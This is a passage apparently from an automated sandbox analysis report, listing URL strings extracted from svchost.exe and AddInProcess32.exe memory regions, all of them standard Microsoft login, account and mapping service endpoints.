                    Source: svchost.exe, 00000011.00000002.1465404864.000001FC9F1C1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000001A.00000002.1472724735.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                    Source: svchost.exe, 00000024.00000003.1359125029.000002B805740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2515177417.000002B804E60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359150126.000002B805763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359079202.000002B80573B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/InlineSignup.aspx?iww=1&id=80502
                    Source: svchost.exe, 00000024.00000003.1359383817.000002B805756000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359125029.000002B805740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2515177417.000002B804E60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1358393670.000002B805752000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359150126.000002B805763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359079202.000002B80573B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/Wizard/Password/Change?id=80601
                    Source: svchost.exe, 00000024.00000003.1359383817.000002B805756000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1358393670.000002B805752000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80601
                    Source: svchost.exe, 00000024.00000003.1359383817.000002B805756000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1358393670.000002B805752000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80603
                    Source: svchost.exe, 00000024.00000003.1359383817.000002B805756000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1358393670.000002B805752000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80604
                    Source: svchost.exe, 00000024.00000003.1359383817.000002B805756000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1358393670.000002B805752000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359532181.000002B80572A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80605
                    Source: svchost.exe, 00000024.00000003.1359125029.000002B805740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2515177417.000002B804E60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359150126.000002B805763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359079202.000002B80573B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80600
                    Source: svchost.exe, 00000024.00000003.1359125029.000002B805740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2515177417.000002B804E60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359150126.000002B805763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359079202.000002B80573B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80601
                    Source: svchost.exe, 00000024.00000003.1359125029.000002B805740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2515177417.000002B804E60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359150126.000002B805763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359079202.000002B80573B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80603
                    Source: svchost.exe, 00000024.00000002.2515177417.000002B804E60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359150126.000002B805763000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80604
                    Source: svchost.exe, 00000024.00000002.2515177417.000002B804E60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359150126.000002B805763000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80605
                    Source: svchost.exe, 00000024.00000003.1359125029.000002B805740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359102832.000002B805757000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1358393670.000002B805752000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359532181.000002B80572A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359079202.000002B80573B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/msangcwam
                    Source: svchost.exe, 00000024.00000002.2515032763.000002B804E40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/msangcwamvice
                    Source: svchost.exe, 00000003.00000003.1364013063.00000215E6C58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
                    Source: svchost.exe, 00000003.00000003.1364013063.00000215E6C58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1366155272.00000215E6C59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/V1/MapControlConfiguration/native/
                    Source: svchost.exe, 00000003.00000002.1366447349.00000215E6C63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
                    Source: svchost.exe, 00000003.00000003.1364013063.00000215E6C58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
                    Source: svchost.exe, 00000003.00000003.1363757483.00000215E6C67000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1366478054.00000215E6C68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
                    Source: svchost.exe, 00000003.00000003.1362941126.00000215E6C74000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1366539238.00000215E6C76000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Transit/Stops/
                    Source: svchost.exe, 00000003.00000003.1364013063.00000215E6C58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
                    Source: svchost.exe, 00000003.00000003.1364013063.00000215E6C58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1363814571.00000215E6C62000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1364259093.00000215E6C5A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1366447349.00000215E6C63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Imagery/Copyright/
                    Source: svchost.exe, 00000003.00000003.1364013063.00000215E6C58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
                    Source: svchost.exe, 00000003.00000003.1363757483.00000215E6C67000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1365960193.00000215E6C2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1366478054.00000215E6C68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
                    Source: svchost.exe, 00000003.00000003.1364013063.00000215E6C58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
                    Source: svchost.exe, 00000003.00000003.1364013063.00000215E6C58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
                    Source: svchost.exe, 00000003.00000003.1364013063.00000215E6C58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
                    Source: svchost.exe, 00000003.00000002.1366055215.00000215E6C3F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1363814571.00000215E6C62000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1366447349.00000215E6C63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Traffic/Incidents/
                    Source: svchost.exe, 00000003.00000002.1366055215.00000215E6C3F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
                    Source: svchost.exe, 00000003.00000003.1364013063.00000215E6C58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
                    Source: svchost.exe, 00000003.00000003.1363814571.00000215E6C62000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1366447349.00000215E6C63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
                    Source: svchost.exe, 00000003.00000003.1364293174.00000215E6C4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
                    Source: svchost.exe, 00000003.00000002.1366055215.00000215E6C3F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
                    Source: svchost.exe, 00000003.00000003.1363814571.00000215E6C62000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1366447349.00000215E6C63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
                    Source: svchost.exe, 00000003.00000002.1366086819.00000215E6C44000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1364324633.00000215E6C43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gri?pv=1&r=
                    Source: svchost.exe, 00000003.00000002.1366539238.00000215E6C76000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.t
                    Source: svchost.exe, 00000003.00000003.1364013063.00000215E6C58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
                    Source: svchost.exe, 00000003.00000003.1362821532.00000215E6C33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/V1/MapControlConfiguration/native/
                    Source: svchost.exe, 00000003.00000003.1363757483.00000215E6C67000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1365960193.00000215E6C2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1366478054.00000215E6C68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
                    Source: svchost.exe, 00000024.00000002.2516513363.000002B804F13000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2519109221.000002B805CB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
                    Source: svchost.exe, 00000024.00000002.2518170013.000002B805C13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/
                    Source: svchost.exe, 00000024.00000002.2515177417.000002B804E60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359150126.000002B805763000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ApproveSession.srf
                    Source: svchost.exe, 00000024.00000003.1359125029.000002B805740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359079202.000002B80573B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ApproveSession.srfe.com
                    Source: svchost.exe, 00000024.00000003.1359383817.000002B805756000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1358393670.000002B805752000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&amp;id=80600
                    Source: svchost.exe, 00000024.00000003.1359383817.000002B805756000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1358393670.000002B805752000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&amp;id=80601
                    Source: svchost.exe, 00000024.00000003.1359171467.000002B80576B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2515177417.000002B804E60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359150126.000002B805763000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80502
                    Source: svchost.exe, 00000024.00000003.1359171467.000002B80576B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2515177417.000002B804E60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359150126.000002B805763000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80600
                    Source: svchost.exe, 00000024.00000003.1359171467.000002B80576B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2515177417.000002B804E60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359150126.000002B805763000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80601
                    Source: svchost.exe, 00000024.00000003.1359125029.000002B805740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2515032763.000002B804E40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359079202.000002B80573B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ListSessions.srf
                    Source: svchost.exe, 00000024.00000003.1359125029.000002B805740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2515177417.000002B804E60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359150126.000002B805763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359079202.000002B80573B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ManageApprover.srf
                    Source: svchost.exe, 00000024.00000003.1359125029.000002B805740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2515177417.000002B804E60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359150126.000002B805763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359079202.000002B80573B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ManageLoginKeys.srf
                    Source: svchost.exe, 00000024.00000003.1390016964.000002B804EE4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359125029.000002B805740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2515392408.000002B804E81000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2518233779.000002B805C37000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2515032763.000002B804E40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2516290801.000002B804EE1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359079202.000002B80573B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/RST2.srf
                    Source: svchost.exe, 00000024.00000002.2516290801.000002B804EE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/RST2.srf$V
                    Source: svchost.exe, 00000024.00000002.2515032763.000002B804E40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/didtou.srf
                    Source: svchost.exe, 00000024.00000003.1359125029.000002B805740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359079202.000002B80573B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/didtou.srfo.srf
                    Source: svchost.exe, 00000024.00000003.1359125029.000002B805740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2515032763.000002B804E40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359079202.000002B80573B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/getrealminfo.srf
                    Source: svchost.exe, 00000024.00000003.1359125029.000002B805740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2515032763.000002B804E40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359079202.000002B80573B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/getuserrealm.srf
                    Source: svchost.exe, 00000024.00000003.1359383817.000002B805756000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsec
                    Source: svchost.exe, 00000024.00000003.1359171467.000002B80576B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2515032763.000002B804E40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359150126.000002B805763000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceAssociate.srf
                    Source: svchost.exe, 00000024.00000002.2515032763.000002B804E40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceAssociate.srfIssuerP
                    Source: svchost.exe, 00000024.00000003.1359171467.000002B80576B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2515032763.000002B804E40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359150126.000002B805763000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceDisassociate.srf
                    Source: svchost.exe, 00000024.00000003.1359125029.000002B805740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2515177417.000002B804E60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359150126.000002B805763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359079202.000002B80573B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceQuery.srf
                    Source: svchost.exe, 00000024.00000003.1359171467.000002B80576B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359150126.000002B805763000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceUpdate.srf
                    Source: svchost.exe, 00000024.00000002.2515032763.000002B804E40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceUpdate.srftificates
                    Source: svchost.exe, 00000024.00000003.1359171467.000002B80576B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2515032763.000002B804E40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359150126.000002B805763000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/EnumerateDevices.srf
                    Source: svchost.exe, 00000024.00000003.1359125029.000002B805740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2515177417.000002B804E60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359150126.000002B805763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359079202.000002B80573B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/GetAppData.srf
                    Source: svchost.exe, 00000024.00000002.2515032763.000002B804E40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/GetAppData.srfrfrf6085fid=cpsrf
                    Source: svchost.exe, 00000024.00000003.1359171467.000002B80576B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2515032763.000002B804E40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359150126.000002B805763000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/GetUserKeyData.srf
                    Source: svchost.exe, 00000024.00000003.1359171467.000002B80576B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2515177417.000002B804E60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359150126.000002B805763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359532181.000002B80572A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineClientAuth.srf
                    Source: svchost.exe, 00000024.00000003.1359383817.000002B805756000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359125029.000002B805740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2515177417.000002B804E60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1358393670.000002B805752000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359150126.000002B805763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359079202.000002B80573B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80600
                    Source: svchost.exe, 00000024.00000003.1359383817.000002B805756000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359125029.000002B805740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2515177417.000002B804E60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1358393670.000002B805752000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359150126.000002B805763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359079202.000002B80573B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80601
                    Source: svchost.exe, 00000024.00000003.1359383817.000002B805756000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359125029.000002B805740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2515177417.000002B804E60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359150126.000002B805763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359079202.000002B80573B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80603
                    Source: svchost.exe, 00000024.00000003.1359383817.000002B805756000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2515177417.000002B804E60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1358393670.000002B805752000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359150126.000002B805763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359532181.000002B80572A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80604
                    Source: svchost.exe, 00000024.00000003.1359171467.000002B80576B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2515177417.000002B804E60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359150126.000002B805763000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineDesktop.srf
                    Source: svchost.exe, 00000024.00000003.1359532181.000002B80572A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineDesktop.srfm
                    Source: svchost.exe, 00000024.00000003.1359125029.000002B805740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2515177417.000002B804E60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359150126.000002B805763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359079202.000002B80573B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80502
                    Source: svchost.exe, 00000024.00000003.1359125029.000002B805740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2515177417.000002B804E60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359150126.000002B805763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359079202.000002B80573B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80600
                    Source: svchost.exe, 00000024.00000003.1359383817.000002B805756000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359125029.000002B805740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2515177417.000002B804E60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1358393670.000002B805752000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359150126.000002B805763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359079202.000002B80573B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80601
                    Source: svchost.exe, 00000024.00000003.1359383817.000002B805756000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359125029.000002B805740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2515177417.000002B804E60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1358393670.000002B805752000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359150126.000002B805763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359079202.000002B80573B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80603
                    Source: svchost.exe, 00000024.00000003.1358393670.000002B805752000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359150126.000002B805763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359532181.000002B80572A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359079202.000002B80573B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80604
                    Source: svchost.exe, 00000024.00000003.1359383817.000002B805756000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2515177417.000002B804E60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1358393670.000002B805752000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359150126.000002B805763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359532181.000002B80572A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80605
                    Source: svchost.exe, 00000024.00000003.1359383817.000002B805756000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2515177417.000002B804E60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1358393670.000002B805752000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359150126.000002B805763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359532181.000002B80572A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80606
                    Source: svchost.exe, 00000024.00000002.2515177417.000002B804E60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1358393670.000002B805752000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359150126.000002B805763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359532181.000002B80572A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80607
                    Source: svchost.exe, 00000024.00000002.2515177417.000002B804E60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359102832.000002B805757000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1358393670.000002B805752000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359150126.000002B805763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359532181.000002B80572A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80608
                    Source: svchost.exe, 00000024.00000003.1359383817.000002B805756000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1358393670.000002B805752000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80601&amp;fid=cp
